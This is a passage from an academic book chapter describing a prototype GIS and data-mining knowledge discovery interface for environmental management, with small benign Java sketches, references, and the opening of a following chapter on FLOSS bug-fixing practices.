categories of spatial analysis as statistical spatial data analysis (SDA), map-based analysis, and mathematical modeling. Haining (1994) believes that for GIS to attain its full measure, it needs to incorporate SDA techniques. The nature of this link between spatial analysis and GIS is the subject of the spatial component implementation. Based on the study of the linkage between GIS and spatial analysis, Goodchild et al. (1991) distinguished between four scenarios:

1. Free-standing spatial analysis software
2. Loose coupling of proprietary GIS software with statistical software
3. Close coupling of GIS and statistical software
4. Complete integration of statistical spatial analysis in GIS
Of the four, most attention is on close coupling or loose coupling (Gatrell & Rowlingson, 1994), mostly because both options give developers and users freedom to implement the linkage in the way that best accomplishes their task. They also make it easy to integrate other components as the need arises. The spatial component is the integration of GIS tools and statistical tools. While the geospatial
component seeks to encapsulate the data in a way that will enhance knowledge discovery, the spatial component deals with manipulating the raw data in a way that will enhance the application of the appropriate levels of theory and modeling capability in real problem-solving situations (O'Kelly, 1994). To this end, the spatial component provides the tools for analysis and transformation of spatial data for environmental studies. To be able to perform the analysis, the spatial component must first be able to extract the data. To extract the data, it needs access to the GIS tools for data integration, filtering, cleaning, and all the other necessary data preprocessing tasks. The spatial component must also possess tools that allow the results of the spatial analysis to be used to update the database, in addition to the ability to view the results. Figure 4 provides the schematics of how the spatial component works.

Figure 4. Schematics of the interactions within the spatial component
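The extract, analyze, and update cycle described above can be sketched as follows. The repository interface stands in for the GIS data-access and preprocessing tools, and the summary statistics are only placeholders for the statistical spatial data analysis that would run in practice; all names are illustrative assumptions.

```java
// Minimal sketch of the spatial component's extract-analyze-update cycle.
import java.util.HashMap;
import java.util.List;
import java.util.Map;

interface SpatialDataRepository {
    List<double[]> extract(String layer);                          // preprocessed observations
    void storeResult(String layer, Map<String, Double> summary);   // write results back
}

class SpatialAnalyzer {
    /** Stand-in analysis: summary statistics over one numeric attribute. */
    Map<String, Double> summarize(List<double[]> observations) {
        double sum = 0.0, sumSq = 0.0;
        int n = 0;
        for (double[] obs : observations) {
            double v = obs[obs.length - 1]; // last column holds the attribute of interest
            sum += v;
            sumSq += v * v;
            n++;
        }
        double mean = n == 0 ? 0.0 : sum / n;
        double variance = n == 0 ? 0.0 : sumSq / n - mean * mean;
        return Map.of("mean", mean, "variance", variance);
    }
}

class SpatialComponent {
    private final SpatialDataRepository repository;
    private final SpatialAnalyzer analyzer = new SpatialAnalyzer();

    SpatialComponent(SpatialDataRepository repository) { this.repository = repository; }

    /** Extracts a layer, analyzes it, and writes the results back for later reuse. */
    void analyzeAndUpdate(String layer) {
        List<double[]> data = repository.extract(layer);
        repository.storeResult(layer + "_summary", analyzer.summarize(data));
    }
}

class SpatialComponentDemo implements SpatialDataRepository {
    private final Map<String, Map<String, Double>> results = new HashMap<>();

    @Override
    public List<double[]> extract(String layer) {
        // Stands in for reading preprocessed observations from a geodatabase layer.
        return List.of(new double[]{1.0, 4.2}, new double[]{2.0, 9.7});
    }

    @Override
    public void storeResult(String layer, Map<String, Double> summary) {
        results.put(layer, summary);
        System.out.println(layer + " -> " + summary);
    }

    public static void main(String[] args) {
        new SpatialComponent(new SpatialComponentDemo()).analyzeAndUpdate("nitrate_samples");
    }
}
```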
Knowledge Component

Spatial decision support systems (SDSS) are very important tools for planning and decision making in environmental management. Normally, SDSS combine spatially explicit observational data and simulations of physical processes with a representation that is suited for nonspecialist decision makers and other stakeholders (Taylor, Walker & Abel, 1999). They also provide users and decision makers with the tools for dealing with ill- or semistructured spatial problems, in addition to providing an adequate level of performance (Abiteboul, 1997; Hopkins, 1984; Stefanakis et al., 1999; Taylor et al., 1999). According to Ting (2003), sustainable development demands complex decision making that combines the environmental, social, and economic consequences of the choices made with regard to resource management. Such decision making, she continues, requires ready access to current, relevant, and accurate spatial information by decision makers and stakeholders. Feeney (2003) argues that spatial information is one of the most critical elements underpinning decision making for many disciplines. She goes on to define decision support as the automation, modeling, and/or analysis that enables information to be shaped from data. The task of the knowledge component is to transform the extracted information into knowledge, thereby improving the quality of the decision-making process. It accomplishes this task by providing the necessary input for creating new environmental models or validating and updating existing ones. As a result, the knowledge component is made up of a collection of learning algorithms. The knowledge component acts as the decision support of the entire system. As the decision support component, it can be used to structure, filter, and integrate information, model information where gaps occur in data, produce alternative solution scenarios as well as weight these according to priorities, and, most importantly, facilitate group as well as distributed participation in decision making (Feeney, 2003). The interactions taking place in the component are shown diagrammatically in Figure 5. The interactions form the basis of the implementation. The figure shows a tightly coupled integration of the components, ensuring that the data and knowledge extracted are tied together.

Figure 5. Interactions within the knowledge component
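One way to picture the knowledge component as a collection of learning algorithms is as a small registry behind a common learner interface, sketched below. The learner shown is a deliberately trivial stand-in for the neural network and other algorithms discussed in the next section; the class names and record layout are assumptions made for the example.

```java
// Hedged sketch: the knowledge component as a registry of learning algorithms.
import java.util.HashMap;
import java.util.List;
import java.util.Map;

interface Learner {
    /** Fits a model and returns a human-readable description of what was learned. */
    String learn(List<double[]> labeledRecords);
}

/** Toy learner: predicts the majority class; a real system would plug in richer algorithms. */
class MajorityClassLearner implements Learner {
    @Override
    public String learn(List<double[]> labeledRecords) {
        int positives = 0;
        for (double[] r : labeledRecords) {
            if (r[r.length - 1] > 0.5) positives++; // last column is the 0/1 label
        }
        boolean majorityPositive = positives * 2 >= labeledRecords.size();
        return "Default prediction: " + (majorityPositive ? "contaminated" : "safe")
                + " (" + positives + "/" + labeledRecords.size() + " positive examples)";
    }
}

class KnowledgeComponentRegistry {
    private final Map<String, Learner> learners = new HashMap<>();

    void register(String name, Learner learner) { learners.put(name, learner); }

    /** Runs a named learner on prepared data and returns decision-support output. */
    String apply(String name, List<double[]> labeledRecords) {
        Learner learner = learners.get(name);
        if (learner == null) {
            throw new IllegalArgumentException("No learner registered as " + name);
        }
        return learner.learn(labeledRecords);
    }

    public static void main(String[] args) {
        KnowledgeComponentRegistry kc = new KnowledgeComponentRegistry();
        kc.register("majority", new MajorityClassLearner());
        List<double[]> records = List.of(
                new double[]{3.1, 1.0},   // attribute value, label (1 = contaminated)
                new double[]{0.4, 0.0},
                new double[]{2.8, 1.0});
        System.out.println(kc.apply("majority", records));
    }
}
```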
POTENTIAL APPLICATIONS OF THE KDI

The possibility of packaging data mining methods as reusable software application objects has opened up the whole realm of knowledge discovery to people outside the traditional usage base. The KDI enables a knowledge discovery platform optimized for environmental applications by integrating state-of-the-art standalone GIS applications and data mining functionality in a closely coupled, open, and extensible system
architecture. The data mining functionality can be used to validate models for decision support systems used in generating environmental policies. For example, Mishra, Ray, and Kolpin (in press) conducted research on the neural network analysis of agrichemical occurrence in drinking water wells to predict the vulnerability of rural domestic wells in several Midwestern states of the USA to agrichemical contamination. The research objectives included studying the correctness of results from the neural network analysis in estimating the level of contamination with a known set of data and showing the impact of input parameters and methods used to interpret the results. Also, Hsu et al. (1995), Shamseldin (1997), Shukla, Kok, Prasher, Clark, and Lacroix (1996), Kao (1996), Yang, Prasher, and Lacroix (1996), Maier and Dandy (1996), Schaap and Bouten (1996), Schaap and Linhart (1998), and Basheer, Reddi, and Najjar (1996) have all applied neural network analysis to various problems in the agriculture, water resources, and environmental domains. The KDI is a great resource for applying data mining applications to water- and environment-related problems. It also provides the platform for performing machine learning analysis on the volumes of environmental data collected, in order to keep up with the pace at which they are being collected. The KDI can be used as a teaching tool for an introductory course for students interested in the partnership between GIS, data mining, and environmental management without overloading them with advanced GIS. It will also widen the scope of environmental students in the area of programming languages by challenging them to design models that are portable and reusable. It can also serve as a teaching aid in creating the need for more public participation in environmental resource management within the framework of the long-distance education paradigm. The KDI is a prototype for using an object-oriented programming platform to enable the design of environmental modeling systems that are reusable, with well-defined inputs, outputs, and controls for easy integration.
KDI IMPLEMENTATION

In the implementation, a GIS-based system that integrates logic programming and relational database techniques has been adopted. It is well documented that geographic analysis and spatial visualization improve operational efficiency, decision making, and problem solving. Software developers need the flexibility to build domain-specific, easy-to-use applications that incorporate the power of GIS technology into a focused, user-friendly application (ESRI, 2004). The KDI implementation consists of a GIS component and the Java Foundation Classes, JFC (see http://java.sun.com). JFC encompass a group of features for building graphical user interfaces (GUIs) and adding rich graphics functionality and interactivity to applications. The KDI application consists of a GIS component, the data mining application, and the JFC that provide the interface for connecting them (Onwu, 2005). The GIS component is implemented using the ArcGIS® Engine, which is an integrated family of GIS software products from ESRI® that delivers complete, scalable GIS at the project, work group, and enterprise levels (ESRI, 2004). It contains developer application programming interfaces (APIs) that embed GIS logic in non-GIS-centric applications and efficiently build and deploy custom ArcGIS applications on the desktop. The data mining application can be implemented with any third-party data mining application. Basically, it provides the collection of machine learning algorithms for data mining tasks. This includes algorithms for classification and regression, dependency modeling/link analysis, and clustering. The algorithms can either be applied directly to a dataset or called from user-defined Java code. The choice of ESRI® products is informed by the fact that they are one of the few GIS companies
with a commitment to human and institutional capacity building in Africa. JFC is open source and will not cost the users anything to implement. The portability of the application ensures that it can be used in any operating system environment, which is an important consideration in an environment where there are not a lot of choices. In addition, JFC ensures that the implementation can be done in any other language besides English. This makes it possible for the end users to take ownership of the application.
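A minimal sketch of how the JFC portion of such an implementation might look is given below. It uses plain Swing components only; the map placeholder merely marks where an embedded GIS map control would sit, and no ArcGIS Engine or third-party mining API is invoked here, since those calls depend on the specific products chosen.

```java
// Minimal Swing (JFC) shell for the KDI sketch. The map panel is a plain
// placeholder standing in for an embedded GIS control; no vendor API is used.
import javax.swing.JButton;
import javax.swing.JFrame;
import javax.swing.JLabel;
import javax.swing.JPanel;
import javax.swing.SwingUtilities;
import java.awt.BorderLayout;

public class KdiShell {
    public static void main(String[] args) {
        SwingUtilities.invokeLater(KdiShell::createAndShow);
    }

    private static void createAndShow() {
        JFrame frame = new JFrame("Environmental KDI (sketch)");
        frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);

        JPanel mapPlaceholder = new JPanel();
        mapPlaceholder.add(new JLabel("Map control would be embedded here"));

        JLabel status = new JLabel("Idle");
        JButton mineButton = new JButton("Run data mining");
        // The listener is where a third-party mining library would be invoked.
        mineButton.addActionListener(e -> status.setText("Mining selected features..."));

        frame.add(status, BorderLayout.NORTH);
        frame.add(mapPlaceholder, BorderLayout.CENTER);
        frame.add(mineButton, BorderLayout.SOUTH);
        frame.setSize(480, 320);
        frame.setVisible(true);
    }
}
```

Because Swing is part of the standard Java platform, a shell of this kind can be localized and redistributed without licensing costs, which matches the portability and cost considerations raised above.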
FUTURE ISSUES

This section discusses some of the emerging technologies and how they are redefining the need for the KDI and the future of the synergy of GIS and data mining.
GeoSensors

GIS has been evolving over the years in response to advances in database management technologies. Currently, advances in sensor technology and deployment strategies are transforming the way geospatial data is collected and analyzed and the quality with which it is delivered (NAS, 2003). This presupposes that the current methods of storing geospatial information are bound to change. The change is predicated on the fact that the homogeneous collection of data is now being replaced by a heterogeneous collection of data for an area of interest, for example, video and temperature feeds. The nature of these feeds means that pieces of information will vary in content, resolution, and accuracy, in addition to having a spatiotemporal component (Nittel & Stefanidis, 2005). The current trend in geosensor technology is also going to affect the time for data analysis. Usually, data is analyzed after it has been downloaded, but with regard to energy considerations for the sensors, there might be the need to do real-time analysis of the data being
collected so that the sensor can discard unnecessary data and transmit useful data in accordance with the study requirements. This implies having an on-chip data mining capability. As a result, the geospatial nature of the data being collected would necessitate GIS functionality tightly integrated with the on-chip data mining application. This is targeted at minimizing the energy consumption of the sensors by reducing the amount of data to transmit. Nittel and Stefanidis (2005) suggested minimizing data acquisition time as a solution to energy optimization. In response to the ongoing development of sensor technology, Tao, Liang, Croitoru, Haider, and Wang (2005) propose the Sensor Web, which would be the sensor equivalent of the Internet. According to them, the Sensor Web would be a global sensor that connects all sensors or sensor databases. The Sensor Web would be interoperable, intelligent, dynamic, scalable, and mobile. This is certainly going to revolutionize the concept of GPS systems. With these sensors connecting wirelessly via the Internet and possibly by satellite linkages, the possibility increases of having a live feed for each location on the surface of the earth, complete with video, audio, and other parameters of interest at a particular time. It would be like having a live Webcam with the added benefit of knowing the current wind speed, temperature, humidity, and so forth, all wrapped up within the framework of a GIS so that the geospatial component is not lost. This will obviously warrant a multimedia data mining application to tap into the vast knowledge trapped in the video images. The knowledge from the video feeds is then integrated with the knowledge from the nonspatial data in order to get a perfect or approximate picture. The emphasis, though, would be not on perfect but on approximate because, as Evan Vlachos framed it in his opening address to GIS 1994, "it is better to be approximately right rather than precisely wrong" (Vlachos, 1994). The success of the scenario painted in the foregoing paragraphs can only be accomplished
in a closely coupled, working multidisciplinary partnership. All the stakeholders involved must be accommodated at the outset to offset the possibility of creating integration problems later down the road. With object-oriented programming platforms, each solution would be implemented as a reusable software application object.
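To illustrate the kind of on-chip screening discussed above, the sketch below keeps a reading only when it differs enough from the last transmitted value, so that radio energy is spent on informative data. The threshold, buffer size, and transmit hook are assumptions made for the example rather than features of any real sensor platform.

```java
// Illustrative on-sensor filter: readings are screened before transmission so
// that only sufficiently "new" data costs radio energy.
import java.util.ArrayDeque;
import java.util.Deque;

class OnChipFilter {
    private final double changeThreshold;
    private final Deque<Double> recent = new ArrayDeque<>();
    private double lastTransmitted = Double.NaN;

    OnChipFilter(double changeThreshold) { this.changeThreshold = changeThreshold; }

    /** Returns true if the reading is worth transmitting (a large enough change). */
    boolean accept(double reading) {
        recent.addLast(reading);
        if (recent.size() > 16) recent.removeFirst(); // bounded on-chip buffer
        if (Double.isNaN(lastTransmitted)
                || Math.abs(reading - lastTransmitted) >= changeThreshold) {
            lastTransmitted = reading;
            return true;
        }
        return false; // discard: within noise of the last transmitted value
    }
}

class SensorNodeDemo {
    public static void main(String[] args) {
        OnChipFilter filter = new OnChipFilter(0.5);
        double[] temperatureFeed = {20.1, 20.2, 20.15, 21.0, 21.1, 22.4};
        for (double t : temperatureFeed) {
            if (filter.accept(t)) {
                System.out.println("Transmit " + t);   // costs transmission energy
            } else {
                System.out.println("Discard  " + t);   // energy saved
            }
        }
    }
}
```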
Geographic Data Mining

The new ArcGIS 9 from ESRI is revolutionizing the concept of a geodatabase. The new ArcSDE has the capability of storing and managing vector, raster, and survey datasets within the framework of a relational database management system (RDBMS) (ESRI, 2004b). This implies that not only is the geospatial data linked to nonspatial datasets; it is also linked to images. Hence the user has the choice of what kind of map to view: vector maps or satellite imagery. This creates an enabling environment for geographic data mining (GDM). Geographic data mining is at best a knowledge discovery process within the context of a map instead of a database. Miller and Han (2001) define it as the application of computational tools to reveal interesting patterns in objects or events distributed in geographic space and across time. The time component specifically refers to the satellite images, which represent pictures taken over time. GDM is closely related to geographic visualization (GV), which is the integration of cartography, GIS, and scientific visualization for the purpose of exploring geographic data in order to communicate geographic information to end users (MacEachren & Kraak, 1997). With these developments, the possibility of performing machine learning analysis on a map object will greatly increase the knowledge available for environmental management, as this will reduce the level of abstraction of spatial data and prevent the loss of spatial information. GDM would also be the best way to capture the contribution of the time component in the knowledge extracted.
There is still the problem of how to incorporate a time component in the RDBMS (NAS, 2003). But GDM of satellite maps would remove the need to abstract the time component, making satellite images a repository of spatio-temporal data. The next task will be to encapsulate these developments in reusable application objects with well-defined user interfaces in order to make them accessible to the managers of environmental resources.
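As a small illustration of keeping the time component rather than abstracting it away, the sketch below groups observations of the same features by year before they are handed to a mining step. The record layout is a simplifying assumption; a real geodatabase would supply richer geometry and metadata.

```java
// Sketch of preparing spatio-temporal records for geographic data mining.
import java.time.LocalDate;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.TreeMap;

class GeoObservation {
    final String featureId;
    final LocalDate observedOn;
    final double value;

    GeoObservation(String featureId, LocalDate observedOn, double value) {
        this.featureId = featureId;
        this.observedOn = observedOn;
        this.value = value;
    }
}

class TemporalGrouping {
    /** Groups observations by year so the time component is preserved for mining. */
    static Map<Integer, List<GeoObservation>> byYear(List<GeoObservation> observations) {
        Map<Integer, List<GeoObservation>> groups = new TreeMap<>();
        for (GeoObservation o : observations) {
            groups.computeIfAbsent(o.observedOn.getYear(), y -> new ArrayList<>()).add(o);
        }
        return groups;
    }

    public static void main(String[] args) {
        List<GeoObservation> obs = List.of(
                new GeoObservation("parcel-7", LocalDate.of(1996, 6, 1), 0.31),
                new GeoObservation("parcel-7", LocalDate.of(2004, 6, 1), 0.58),
                new GeoObservation("parcel-9", LocalDate.of(2004, 7, 1), 0.12));
        byYear(obs).forEach((year, group) ->
                System.out.println(year + ": " + group.size() + " observation(s)"));
    }
}
```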
CONCLUSION

GIS started as a technology for data creation and has now evolved into one for data management. This research focused on the development and implementation of a prototype KDI for environmental science applications. It was predicated on the need to help policy makers come to grips with current environmental challenges. The extensible nature of the KDI makes it a dynamic tool, since it allows for integration with other tools. The challenge now is to package this concept in a cost-effective way as a tool to introduce GIS into the educational curriculum. In all, what GIS does is very simple: it makes a point aware of its position vis-à-vis other points. Stretching this understanding, the concept of a network becomes obvious. The challenge before sub-Saharan African countries becomes how to create a social infrastructure that will connect these points so that they can work for a common goal and avoid duplication of resources. That is the first step in taking the initiative to bridge the knowledge gap with the rest of the world. In 2003, USAID Success Stories captured the current state of Africa's efforts in bridging this gap in the following lines: We find currently that a chasm exists, separating the users of environmental information, policymakers, and scientists from one another. We often think of this as a divide between continents, but more importantly, it is also a divide between islands of expertise. There is a divide
between highly dedicated and competent analysts in Africa from the state of the art in the rest of the world, but also between the analysts and decision-makers, and between the scientific expertise of metropolitan centers and the innate local knowledge of the environment in rural areas (USAID/AFR, 2003). Juma (2006) believes that African universities should take the initiative in community development by developing an educational curriculum that addresses the needs of the community. African universities should re-align themselves so that they become active participants with the international organizations in institutional capacity building. African universities should provide the leverage needed to bring the expertise together. The road to sustainable development in sub-Saharan Africa will not be complete without addressing the role of governments. Juma (2006) proposes the role of government as that of a facilitator. With government as facilitator, a level playing field is created for public-private partnerships, in the form of nongovernmental organizations, to step in and get the knowledge to the rural communities by creating urban-rural partnerships and investing in youths as the harbingers of rural development. As a facilitator, African governments should be committed to the fact that knowledge is the currency of development. If developing countries are to join their developed counterparts in providing basic services to their citizens, there is a need to create a unified system for tracking the vast potential in Africa and organizing it in such a way that it can provide insights that produce policies that bring about development in Africa. The main benefit of establishing a GIS-based system is to stimulate and assist development activities in the region. One way of doing this is by creating a commission tasked with the creation of baseline geographic data at the local government level and converting existing data into digital format. The funding for this commission can be sourced from private
companies or international agencies/foreign aid. The availability of baseline data makes it easy for international development agencies to track the progress of development in a region. In the face of the failure of technology transfer in developing countries, there is a need for a GIS system that answers the more fundamental social and economic questions as well as the technical ones, an opinion exemplified by Ficenec (2003). GIS is very important for stimulating community development by providing a way for policy makers to match resources with the potential available in a community. This leads to grassroots development, poverty reduction, job opportunities, and, overall, an economically viable state.
REFERENCES

Abiteboul, S. (1997). Querying semi-structured data. In Proceedings of the International Conference on Database Theory, Delphi, Greece. AfricaGIS (2005). Conference resolutions draft. Retrieved April 13, 2008, from http://www.africagis2005.org.za/agp/africagispapers/AfricaGIS 2005 Resolutions draft 041105.doc Albertoni, R., Bertone, A., & De Martino, M. A. (2003). Visualization-based approach to explore geographic metadata. In Proceedings of the 11th International Conference in Central Europe on Computer Graphics, Visualization and Computer Vision, WSCG 2003, Plzen-Bory, Czech Republic. Alexandre, F. (1997). Connectionist-symbolic integration: From unified to hybrid approaches. Mahwah, NJ: Lawrence Erlbaum Associates. Bailey, T. C. (1994). A review of statistical spatial analysis in geographical information systems. In A. S. Fotheringham & P. A. Rogerson (Eds.), Spatial analysis and GIS (pp. 14-44). London, UK: Taylor and Francis.
Basheer, I. A., Reddi, L. N., & Najjar, Y. M. (1996). Site characterization by NeuroNets: An application to the landfill siting problem. Ground Water, 34, 610-617. Bedard, Y., Gosselin, P., Rivest, S., Proulx, M., Nadeau, M., Lebel, G., & Gagnon, M. (2003). Integrating GIS components with knowledge discovery technology for environmental health decision support. International Journal of Medical Informatics, 70, 79-94. Blaschke, A. (2001). Environmental monitoring and management of protected areas through integrated ecological information systems: An EU perspective. In C. Rautenstrauch & S. Patig (Eds.), Environmental information systems in industry and public administration (pp. 75-100). Hershey, PA: Idea Group Publishing. Brachman, R. J. & Anand, T. (1996). The process of knowledge discovery in databases. In U. Fayyad, G. Piatetsky-Shapiro, P. Smyth & R. Uthurusamy (Eds.), Advances in knowledge discovery and data mining (pp. 37-57). Cambridge, MA: AAAI/MIT Press. Chainey, S. & Ratcliffe, J. (2005). GIS and crime mapping. Chichester, West Sussex: John Wiley and Sons. Chetty, M. & Buyya, R. (2002). Weaving computational grids: How analogous are they with electrical grids? IEEE Computing in Science and Engineering, July/August, 61-71. Coleman, D. J. & McLaughlin, J. D. (1997). Information access and network usage in the emerging spatial information marketplace. Journal of Urban and Regional Information Systems Association, 9, 8-19. Dunn, C. E., Atkins, P. J., & Townsend, J. G. (1997). GIS for development: A contradiction in terms? Area, 29(2), 151-159.
ESRI (2004a). ArcGIS 9: What is ArcGIS? A White Paper. Redlands, CA: Environmental Systems Research Institute. ESRI (2004b). ArcSDE: Advanced spatial data server. White Paper. Retrieved May 8, 2008 from http://esri.com/library/whitepapers/pdfs/ arcgis_spatial_analyst.pdf Fayyad, U., Piatetsky-Shapiro, G., & Smyth, P. (1996). From data mining to knowledge discovery in databases. AI Magazine, 17, 37-54. Feeney, M. F. (2003). SDIs and decision support. In I. Williamson, A. Rajabifard, & M. F. Feeney (Ed.), Developing spatial data infrastructures: From concept to reality (pp. 195-210). London, UK: Taylor & Francis. Ficenec, C. (2003, June). Explorations of participatory GIS in three Andean watersheds. Paper presented at the University Consortium of Geographic Information Science (UCGIS) Summer Assembly 2003, Pacific Grove, CA. Gatrell, A. & Rowlingson, B. (1994). Spatial point process modeling in a GIS environment. In A.S. Fotheringham & P.A. Rogerson (Ed.), Spatial analysis and GIS (pp. 148-163). London, UK: Taylor and Francis. Goodchild, M. F., Haining, R., & Wise, S. M. (1991). Integrating GIS and spatial data analysis: Problems and possibilities. International Journal of Geographic Information Systems, 6, 407-423. Groot, R. & McLaughlin, J. (2000). Introduction. In R. Groot & J. McLaughlin (Eds.), Geospatial data infrastructure: Concepts, cases and good practice (pp. 1-12). Oxford, UK: Oxford University Press. Haining, R. (1994). Designing spatial data analysis modules for GIS. In A.S. Fotheringham & P.A. Rogerson (Eds.), Spatial analysis and GIS (pp. 46-63). London, UK: Taylor and Francis.
Han, J. (1999). Data mining. In J. Urban & P. Dasgupta (Eds.), Encyclopedia of distributed computing. Kluwer Academic Publishers. Hopkins, L. D. (1984). Evaluation of methods for exploring ill-defined problems. Environment and Planning B: Planning and Design, 11, 339-348. Hsu, K-L., Gupta, H. V., & Sorooshian, S. (1995). Artificial neural network modeling of the rainfall-runoff process. Water Resour. Res., 31, 2517-2530. Juma, C. (2006, April). Reinventing African economies: Technological innovation and the sustainability transition. Paper presented at The John Pesek Colloquium on Sustainable Agriculture, Ames, Iowa. Kao, J-J. (1996). Neural net for determining DEM-based model drainage pattern. Journal of Irrigation and Drainage Engineering, 122, 112-121. Keim, D. A. (2002). Information visualization and visual data mining. IEEE Transactions on Visualization and Computer Graphics, 7, 100-107. Khatri, V., Ram, S., & Snodgrass, R. T. (2004). Augmenting a conceptual model with geospatiotemporal annotations. IEEE Transactions on Knowledge and Data Engineering, 16, 1324-1338. Koua, E. L. & Kraak, M. J. (2004). Geovisualization to support the exploration of large health and demographic survey data. International Journal of Health Geographics, 3, 12. Kraak, M.-J. (2000). Access to GDI and the function of visualization tools. In R. Groot & J. McLaughlin (Eds.), Geospatial data infrastructure: Concepts, cases and good practice (pp. 217-321). Oxford, UK: Oxford University Press. Kufoniyi, O., Huurneman, G., & Horn, J. (2005, April). Human and institutional capacity building in geoinformatics through educational networking. Paper presented at the International
Federation of Surveyors Working Week 2005, Cairo, Egypt. Lee, H. Y., Ong, H. L., & Quek, L. H. (1995). Exploiting visualization in knowledge discovery. In Proceedings of the 1st International Conference on Knowledge Discovery and Data Mining (pp. 198-201), Montreal, Canada. Lee, H. Y., Ong, H. L., Toh, E. W., & Chan, S. K. (1996). A multi-dimensional data visualization tool for knowledge discovery in databases. In Proceedings of IEEE Conference on Visualization (pp. 26-31). Longley, P. A., Goodchild, M. F., Maguire, D. J., & Rhind, D. W. (2001). Geographic information systems and science. West Sussex, England: John Wiley and Sons, Ltd. Maier, H. R. & Dandy, G. C. (1996). The use of artificial neural networks for the prediction of water quality parameters. Water Resour. Res., 32, 1013-1022. MacEachren, A. M. & Kraak, M.-J. (1997). Exploratory cartographic visualization: Advancing the agenda. Computers and Geosciences, 23, 335-343. Miller, H. J. (in press). Geographic data mining and knowledge discovery. In J. P. Wilson & A. S. Fotheringham (Eds.), Handbook of geographic information science. Blackwell. Miller, H. J. & Han, J. (2001). Geographic data mining and knowledge discovery. London: Taylor and Francis. Mishra, A., Ray, C., & Kolpin, D. W. (in press). Use of qualitative and quantitative information in neural networks for assessing agricultural chemical contamination of domestic wells. Journal of Hydrological Engineering. Mitra, S. & Acharya, T. (2003). Data mining: Multimedia, soft computing and bioinformatics. Hoboken, NJ: John Wiley and Sons, Inc.
Mokyr, J. (2002). The gifts of Athena: Historical origins of the knowledge economy. Princeton, NJ: Princeton University Press.
Schaap, M. G. & Bouten, W. (1996). Modeling water retention curves of sandy soils using neural networks. Water Resour. Res., 32, 3033-3040.
Shamseldin, A. Y. (1997). Application of a neural network technique to rainfall-runoff modeling. Journal of Hydrology, 199, 272-294.
National Academy of Sciences (NAS) (2003). IT roadmap to a geospatial future. Washington, D.C.: The National Academies Press.
Shukla, M. B., Kok, R., Prasher, S. O., Clark, G., & Lacroix, R. (1996). Use of artificial neural networks in transient drainage design. Transactions of the ASAE, 39, 119-124.
Nittel, S. & Stefanidis, A. (2005). GeoSensor networks and virtual GeoReality. In S. Nittel & A. Stefanidis (Eds.), GeoSensor networks (pp. 1-9). Boca Raton, FL: CRC Press. O’Kelly, M. E. (1994). Spatial analysis and GIS. In A.S. Fotheringham & P.A. Rogerson (Eds.), Spatial analysis and GIS (pp. 66-79). London, UK: Taylor and Francis. Onwu, I. (2005). Knowledge discovery interface for environmental applications. Unpublished master’s thesis, Iowa State University, Ames. Ratcliffe, J. (2004). Strategic thinking in criminal intelligence. Sydney: Federation Press. Rautenstrauch, C. & Page, B. (2001). Environmental informatics-methods, tools and applications in environmental information processing. In C. Rautenstrauch & S. Patig (Eds.), Environmental information systems in industry and public administration (pp. 2-11). Hershey, PA: Idea Group Publishing. Rüther, H. (2001, October). EIS education in Africa – The geomatics perspective. Paper presented at the International Conference on Spatial Information for Sustainable Development, Nairobi, Kenya Schaap, B. D. & Linhart, S.M. (1998). Quality of ground water used for selected municipal water supplies in Iowa, 1982-96 water years (p. 67). Iowa City, IA: U.S. Geological Survey Open File Report 98-3.
Sobeih, A. (2005). Supporting natural resource management and local development in a developing connection: Bridging the policy gap between the information society and sustainable development. A publication of the International Institute for Sustainable Development (IISD), pp. 186-210. Song, S. (2005). Viewpoint: Bandwidth can bring African universities up to speed. Science in Africa, September 2005. Retrieved April 13, 2008, from http://www.scienceinafrica.co.za/2005/september/bandwidth.htm Speth, J. G. (2004). Red sky at morning: America and the crisis of the global environment. Yale University Press. Stefanakis, E., Vazirgiannis, M., & Sellis, T. (1999). Incorporating fuzzy set methodologies in a DBMS repository for the application domain of GIS. International Journal of Geographic Information Science, 13, 657-675. Taylor, K., Walker, G., & Abel, D. (1999). A framework for model integration in spatial decision support systems. International Journal of Geographic Information Science, 13, 533-555. Tao, V., Liang, S., Croitoru, A., Haider, Z. M., & Wang, C. (2005). GeoSwift: Open geospatial sensing services for sensor web. In S. Nittel & A. Stefanidis (Eds.), GeoSensor Networks (pp. 267-274). Boca Raton, FL: CRC Press.
Thuraisingham, B. M. (1999). Data mining: Technologies, techniques, tools and trends. Boca Raton, FL: CRC Press. Thurston, J., Poiker, T. K., & Moore, J. P. (2003). Integrated geospatial technologies: A guide to GPS, GIS, and data logging. Hoboken, NJ: John Wiley & Sons. Ting, L. (2003). Sustainable development, the place for SDIs, and the potential of e-governance. In I. Williamson, A. Rajabifard & M. F. Feeney (Eds.), Developing spatial data infrastructures: From concept to reality (pp. 183-194). London, UK: Taylor & Francis. USAID (2003). USAID Africa success stories. Retrieved April 13, 2008, from http://africastories. usaid.gov:80/print_story.cfm?storyID=23 Vckovski, A. & Bucher, F. (1996). Virtual data sets - Smart data for environmental applications. In Proceedings of the Third International Conference/Workshop on Integrating GIS and Environmental Modeling, Santa Fe, NM.
Vlachos, E. (1994). GIS, DSS and the future. In Proceedings of the 8th Annual Symposium on Geographic Information Systems in Forestry, Environmental and Natural Resources Management, Vancouver, Canada. Wise, S. M. & Haining, R. P. (1991). The role of spatial analysis in geographical information systems. Westrade Fairs, 3, 1-8. Yang, C.-C., Prasher, S. O., & Lacroix, R. (1996). Application of artificial neural networks to land drainage engineering. Trans. ASAE, 39, 525-533. Zaïane, O. R., Han, J., Li, Z.-N., & Hou, J. (1998). Mining multimedia data. In Proceedings of the CASCON'98: Meeting of Minds (pp. 83-96), Toronto, Canada. Zeiler, M. (1999). Modeling our world: The ESRI guide to geodatabase design. Redlands, CA: ESRI Press.
This work was previously published in Data Mining Applications for Empowering Knowledge Societies, edited by H. Rahman, pp. 260-277, copyright 2009 by Information Science Reference, formerly known as Idea Group Reference (an imprint of IGI Global).
Chapter 2.20
Bug Fixing Practices within Free/Libre Open Source Software Development Teams1

Kevin Crowston, Syracuse University, USA
Barbara Scozzi, Politecnico di Bari, Italy
ABSTRACT

Free/Libre open source software (FLOSS, e.g., Linux or Apache) is primarily developed by distributed teams. Developers contribute from around the world and coordinate their activity almost exclusively by means of email and bulletin boards, yet somehow profit from the advantages and evade the challenges of distributed software development. In this article we investigate the structure and the coordination practices adopted by development teams during the bug-fixing process, which is considered one of the main areas of FLOSS project success. In particular, based on a codification of the messages recorded in the bug tracking system of four projects, we identify the accomplished tasks, the adopted coordination mechanisms, and the role undertaken by both the FLOSS development team and the FLOSS
community. We conclude with suggestions for further research.
INTRODUCTION

